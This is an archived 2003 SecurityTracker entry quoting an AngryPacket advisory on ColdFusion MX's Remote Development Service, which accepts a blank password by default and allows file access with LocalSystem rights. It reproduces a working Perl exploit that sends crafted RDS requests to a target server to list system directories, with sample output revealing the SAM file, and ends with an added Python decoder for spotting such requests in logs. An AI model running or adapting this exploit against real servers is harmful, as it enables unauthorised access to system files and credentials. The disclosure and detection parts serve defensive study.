SecurityTracker.com
SecurityTracker Archives

Category:   Application (Web Server/CGI)  >   Adobe ColdFusion Vendors:   Macromedia
ColdFusion MX Server Default Configuration Gives Remote Users RDS Access
SecurityTracker Alert ID:  1007124
SecurityTracker URL:  http://securitytracker.com/id/1007124
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jul 7 2003
Impact:   Disclosure of system information, Disclosure of user information, Modification of system information, Modification of user information, User access via network
Exploit Included:  Yes  

Description:   Several vulnerabilities were reported in ColdFusion MX Server. A remote user can gain access to the server in the default configuration.

AngryPacket issued a security advisory warning that the default configuration of the Remote Development Service (RDS) does not require a password for authentication. On systems where the administrator has not set a password, a remote user can gain access.

Also by default, it is reported that the RDS Java servlet runs in the context of the ColdFusion application service account, with LocalSystem privileges. A remote authenticated user can reportedly reconfigure their website properties to be able to get and put any file on the server.

It is also reported that when the RDS password is set, the password is transmitted over the network in plain text (without encryption). A remote user that is sniffing the network can obtain the password.

Finally, it is also reported that ASP SESSION IDs are not validated.

Some demonstration exploit code is provided in the Source Message and in the original advisory at:

http://sec.angrypacket.com/advisories/0006_AP.CF-rds-dump.txt

The following notification timeline is provided:

Initial Email - Remote RDS problem and sample runtime exploit code -> Sun Jun 29 18:30:21 CDT 2003
Status: (mon) No Response
Call Macromedia - Get treated like a peckerhead and no one cares.. . -> Monday 4:00pm cali time -> Email: PR -> 4:30 pm cali time.
Next day ( tues ).. .. No one responds.. .. Oh well Post code.

Impact:   A remote authenticated user can read and write files on the target server.

A remote user can gain access to the system (if the system has not been configured with a password).

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.macromedia.com/
Cause:   Access control error, Authentication error, Configuration error
Underlying OS:  Windows (NT), Windows (2000), Windows (XP)

Message History:   None.


 Source Message Contents

Subject:  AngryPacket Security Advisory


http://sec.angrypacket.com/advisories/0006_AP.CF-rds-dump.txt

                   - -- ------------------------- -- -
[>(]                 AngryPacket Security Advisory                 [>(]
                   - -- ------------------------- -- -

+--------------------- -- -
+ advisory information
+------------------ -- -
Exploit Code:               Victim1 <victim1@angrypacket.com>
Initial Bug Report By:      rs2112 <rs2112@hushmail.com>
release date:               06/26/2003


+------------------- -- -
+ timeline of Vendor Notification
+------------------- -- -
1: Initial Email - Remote RDS problem and sample runtime exploit code
-> Sun Jun 29 18:30:21 CDT 2003
1a: Status: (mon) No Response
2: Call Macromedia - Get treated like a peckerhead and no one cares.. .
-> Monday 4:00pm cali time -> Email: PR -> 4:30 pm cali time.
2a: Next day ( tues ).. .. No one responds.. .. Oh well Post code.

+-------------------- -- -
+ product information
+----------------- -- -
software:     Cold Fusion server
vendor:       Macromedia
homepage:     http://www.macromedia.com
description:

With ColdFusion MX, you can build and deploy powerful web applications and web
services with far less training time and fewer lines of code than ASP, PHP, and
JSP. Now available in versions that support industry leading J2EE application
servers, ColdFusion MX enables web application developers to easily harness the
power of the Java platform.

+---------------------- -- -
+ vulnerability details
+------------------- -- -
problem1:     Default Remote Development Service (RDS) configuration ( read, write, retrieve )
problem2:     ASP SESSION IDs are not validated.
affected:     Cold Fusion Server MX

explanation: ColdFusion RDS allows developers to securely access remote files
and data sources, and debug CFML code. Developers can use RDS through
ColdFusion Studio, Homesite+, and Dreamweaver MX to access files and databases
on a remote ColdFusion development server using HTTP. Under CF 4.5/5, RDS ran
as a service; under CFMX, RDS is a JAVA servlet that runs under the context of
the CF Application service account. In both cases, by default, RDS has
LocalSystem authority to the box. When properly configured, RDS requires a
(static) password to authenticate the remote developer. The first
vulnerability (1) is that, due to this level of access, a remote user can
reconfigure their website properties to access (put and get) any file on the CF
server. The second vulnerability (2) is that, by default, RDS does not require
a password for authentication (null password).  Therefore, anyone with a RDS
compatible development application, can attach to a CF server running RDS,
authenticate with a blank password, and own the box. The third vulnerability
(3) is that when the RDS password is set, it is sent over the wire in clear
text.




risk:         High
status:       Awaiting vendor response. ( Read Timeline: Above )
exploit:      As a proof of concept, victim1 has developed beta code that can
be used to exploit the RDS <blank> password vulnerability.  The code
demonstrates the fact that it would be a trivial task to scan the Internet,
determine which servers are running CF, and compromise the box.



fix:    Vulnerability 1 - use a dedicated service account with restricted access to the server.
        Vulnerability 2 - set the d*mn password
        Vulnerability 3 - ASP SESSION ID not validated.
        Vulnerability 4 - ??

+-------- -- -
+ credits
+----- -- -
Vulnerability reported by rs2112.
Exploit code developed by Victim1 of AngryPacket Security group.

+--------------
+  exploit:
+-------------

#!/usr/bin/perl
# RDS_c_Dump.pl
# victim1@angrypacket.com

## BIG NOTE -> aka ( DISCLAIMER ): if you do something retarded with this code or
## modification of this code you are completely on your OWN,
# I or rs2112 take no responsibility for your stupid actions, A JUST BE KNOWN ! This is
# meant for administrators to protect themselves against
# attack and that's it.

## CF 6 MX Server does several things in order to get remote dir structure so we will need
# to recreate these functions. This is an "almost" complete emulation of a dreamweaver
# client connection just FYI,
# in like one full HTTP1/1 session within netcat.
#
# I would like to point out that the ASPSESSID never validates so you can change this on
# the fly.
#
# Also I would like to say Macromedia's phone support sucks ass, I called trying to be a
# nice guy ( to follow up on email ) and
# they attempted to belittle my intelligence on the phone.. . OH and yes I did email them
# several times with no response.
#
# You can Write as well, I have tested and this works fine. If you change the file to an
# *.exe it will attempt to become a
# 16bit dos application on the remote box FYI.
#
# Requests are sent in this order to get a remote dir structure:
# NOTE: Create dir retrieval array.
#
# ANOTHER NOTE:
# Due to certain current situations I am not allowed to release full exploit code with (
# READ, RETRIEVE, WRITE ) functions, I have fully working code,
# If you email me I will not send it to you, so basically don't bother.
#
# I'm sorry for being such a foil fart but hey, you understand I'm sure.
#
# Sample output:
# --------------------------------
# Vic7im1@cipher:~/Scripts/RDS_Sploit$ perl RDS_c_Dump.pl
#
# POST /CFIDE/main/ide.cfm?CFSRV=IDE&ACTION=BrowseDir_Studio HTTP/1.1
#
# Request String Value: 3:STR:15:C:/WINNT/repairSTR:1:*STR:0:
# Content-Length: 37
# Please wait.. ..
# HTTP/1.1 100 Continue
# Server: Microsoft-IIS/5.0
# Date: Tue, 01 Jul 2003 10:30:43 GMT
#
# HTTP/1.1 200 OK
# Server: Microsoft-IIS/5.0
# Date: Tue, 01 Jul 2003 10:30:43 GMT
# Connection: close
# Content-Type: text/html
#
# 50:2:F:11:autoexec.nt1:63:4383:0,02:F:9:config.nt1:64:25773:0,02:F:7:default1:66:1187843:0,02:F:10:ntuser.dat1:66:1187843:0,02:F:3:
# sam1:65:204803:0,02:F:12:secsetup.inf1:66:5735303:0,02:F:8:security1:65:286723:0,02:F:9:setup.log1:66:1551943:0,02:F:8:
# software1:67:65331203:0,02:F:6:system1:66:9748483:0,0
# Vic7im1@cipher:~/Scripts/RDS_Sploit$
# ----------------------------------


use strict;
use IO::Socket;

use vars qw($response @clength @rarray);

## Dreamweaver string requests to ide.cfm
## --------------------------------------
#1:  3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:    		Content-Length: 46
#2:  3:STR:7:C:/_mm/STR:1:*STR:0:		      		Content-Length: 28
#3:  3:STR:6:C:/_mmSTR:9:ExistenceSTR:0:STR:0:STR:0:   		Content-Length: 47
#4:  3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:    		Content-Length: 46
#5:  3:STR:10:C:/_notes/STR:1:*STR:0:		      		Content-Length: 32
#6:  5:STR:9:C:/_notesSTR:9:ExistenceSTR:0:STR:0:STR:0 		Content-Length: 50
#7:  3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:    		Content-Length: 46
#8:  5:STR:12:C:/XYIZNWSK/STR:6:CreateSTR:0:STR:0:STR:0: 	Content-Length: 51
#9:  3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:		Content-Length: 46
#10: 3:STR:3:C:/STR:1:*STR:0:					Content-Length: 24
#11: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:		Content-Length: 46
#12: 5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:	Content-Length: 53
#13: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:		Content-Length: 46
#14: 5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:	Content-Length: 53
#15: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:		Content-Length: 46
#16: 5:STR:11:C:/XYIZNWSKSTR:6:RemoveSTR:0:STR:0:DSTR:0:	Content-Length: 51
#17: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:		Content-Length: 46
#18: 3:STR:8:C:/WINNTSTR:1:*STR*STR:0:				Content-Length: 29
#19: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:		Content-Length: 46
#20: 3:STR:15:C:/WINNT/repairSTR:1:*STR:0:			Content-Length: 37


# Static Content-Length: $string_val if you plan on leaving C:\WINNT\repair you will need
# to know
# the $string_val.
@clength = ( "Content-Length: 46",
	     "Content-Length: 28",
	     "Content-Length: 47",
	     "Content-Length: 46",
	     #"Content-Length: 32",
	     #"Content-Length: 50",
	     "Content-Length: 46",
	     "Content-Length: 51",
	     "Content-Length: 46",
	     "Content-Length: 24",
	     "Content-Length: 46",
	     "Content-Length: 53",
	     "Content-Length: 46",
	     "Content-Length: 53",
	     "Content-Length: 46",
	     "Content-Length: 51",
	     "Content-Length: 46",
	     "Content-Length: 29",
	     "Content-Length: 46",
	     "Content-Length: 37"
	   );


@rarray = ( "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
	    "3:STR:7:C:/_mm/STR:1:*STR:0:",
	    "3:STR:6:C:/_mmSTR:9:ExistenceSTR:0:STR:0:STR:0:",
	    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
	    #"3:STR:10:C:/_notes/STR:1:*STR:0:",
	    #"5:STR:9:C:/_notesSTR:9:ExistenceSTR:0:STR:0:STR:0",
	    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
	    "5:STR:12:C:/XYIZNWSK/STR:6:CreateSTR:0:STR:0:STR:0:",
	    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
	    "3:STR:3:C:/STR:1:*STR:0:",
	    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
	    "5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:",
	    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
	    "5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:",
	    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
	    "5:STR:11:C:/XYIZNWSKSTR:6:RemoveSTR:0:STR:0:DSTR:0:",
	    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
	    "3:STR:8:C:/WINNTSTR:1:*STR*STR:0:",
	    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
	    "3:STR:15:C:/WINNT/repairSTR:1:*STR:0:"
	    );



system("clear");
# change target addy below.
my $TARGET = "192.168.0.100";
my $PORT = "80";
my $STRING = "C:/WINNT/repair";
my $POST = "POST /CFIDE/main/ide.cfm?CFSRV=IDE&ACTION=BrowseDir_Studio HTTP/1.1\r\n";


print "Generating Socket with Array Directory Values.\n";
my ( $i, $c);
for ( $i = 0; $i < @rarray; $i++  ) {
	for ( $c = 0; $c < @clength; $c++ ) {	
			if( $i == $c ) {
			&gen_sock($TARGET, $PORT, $rarray[$i], $clength[$c]);
		}
	}
}


sub gen_sock() {
	my $sock = new IO::Socket::INET(PeerAddr => $TARGET,
					PeerPort => $PORT,
					Proto	 => 'tcp',
					);
	die "Socket Could not be established ! $!" unless $sock;
	print "Target: $TARGET:$PORT\n";
	print "$POST\n";
	print "Request String Value: $rarray[$i]\n";
	print "$clength[$c]\n";
	print "Please wait.. ..\n";
	print $sock "$POST";
	print $sock "Content-Type: application/x-ColdFusionIDE\r\n";
	print $sock "User-Agent: Dreamweaver-RDS-SCM1.00\r\n";
	print $sock "Host: $TARGET\r\n";
	print $sock "$clength[$c]\r\n";
	print $sock "Connection: Keep-Alive\r\n";
	print $sock "Cache-Control: no-cache\r\n";
	print $sock "Cookie: ASPSESSIONIDQQQQGLDK=LPIHIKCAECKACDGPJCOLOAOJ\r\n";
	print $sock "\r\n";
	print $sock "$rarray[$i]";
	
	# lets return and print data to term
	while($response = <$sock>) {
		chomp($response);
		print "$response\n";
	}
	close($sock);
}




+----------- -- -
+ disclaimer
+-------- -- -
READ IN THE SCRIPT.

Oh and Happy 4th of July !
- -- -------------------------


#EOT
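Added example (not part of the advisory or of SecurityTracker's entry): a decoder for the RDS IDE request encoding shown in the script's comment table, intended for reviewing IIS logs or captured traffic for BrowseDir_Studio and similar requests to /CFIDE/main/ide.cfm. The field layout ("<count>:" followed by "STR:<len>:<value>" fields, whose total length equals the Content-Length values listed) is inferred from the request strings on the page, not from vendor documentation; the sample request is constructed from the script's own values.

```python
import re

# Assumption (inferred from the request strings in the script above, not vendor
# documentation): body = "<count>:" then <count> fields "STR:<len>:<value>",
# where <value> is exactly <len> bytes; Content-Length equals the total.
RDS_IDE_PATH = "/cfide/main/ide.cfm"   # compared case-insensitively (IIS)

def decode_rds_body(body):
    """Return (fields, error). error is None for a well-formed body;
    otherwise it names the defect and fields holds what parsed so far."""
    fields = []
    m = re.match(r"(\d+):", body)
    if not m:
        return fields, "missing field count"
    count, pos = int(m.group(1)), m.end()
    for _ in range(count):
        if not body.startswith("STR:", pos):
            return fields, f"expected 'STR:' at offset {pos}"
        m = re.match(r"(\d+):", body[pos + 4:])
        if not m:
            return fields, f"bad field length at offset {pos + 4}"
        length, pos = int(m.group(1)), pos + 4 + m.end()
        if pos + length > len(body):
            return fields, "field runs past end of body (truncated?)"
        fields.append(body[pos:pos + length])
        pos += length
    if pos != len(body):
        return fields, f"{len(body) - pos} trailing byte(s) after last field"
    return fields, None

def inspect_request(request_line, body):
    """Flag an RDS IDE request for review; None when the request is not RDS.
    The first decoded field is the server-side path the client asked about."""
    m = re.match(r"(\w+)\s+(\S+)\s+HTTP/", request_line)
    if not m or not m.group(2).lower().startswith(RDS_IDE_PATH):
        return None
    action = re.search(r"[?&]ACTION=([^&\s]+)", m.group(2))
    fields, err = decode_rds_body(body)
    return {"method": m.group(1),
            "action": action.group(1) if action else None,
            "path": fields[0] if fields else None,
            "fields": fields,
            "error": err}

# Constructed sample, modelled on the BrowseDir_Studio request in the script above.
SAMPLE_LINE = "POST /CFIDE/main/ide.cfm?CFSRV=IDE&ACTION=BrowseDir_Studio HTTP/1.1"
SAMPLE_BODY = "3:STR:15:C:/WINNT/repairSTR:1:*STR:0:"
```

A flagged request whose decoded path lies outside the web root is the pattern the advisory describes, and any such request on a server where no RDS password has been set deserves immediate attention.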




 
 


Copyright 2019, SecurityGlobal.net LLC